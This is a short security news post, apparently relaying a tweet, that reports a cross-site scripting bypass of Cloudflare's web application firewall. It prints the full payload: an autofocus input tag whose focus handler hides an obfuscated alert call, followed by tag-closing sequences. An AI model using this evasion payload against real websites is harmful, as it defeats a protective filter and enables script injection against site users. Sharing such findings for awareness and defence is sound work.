A bypass for Cloudflare WAF has been discovered for XSS vulnerability. The payload used for bypass is <inpuT autofocus oNFocus="setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;. This bypass exploits the autofocus attribute to trigger an alert function after a delay. #cloudflare #bypass #waf #xss
Check out the original tweet here: https://twitter.com/0xA1d3/status/1781575999701786814
Subscribe for the latest news: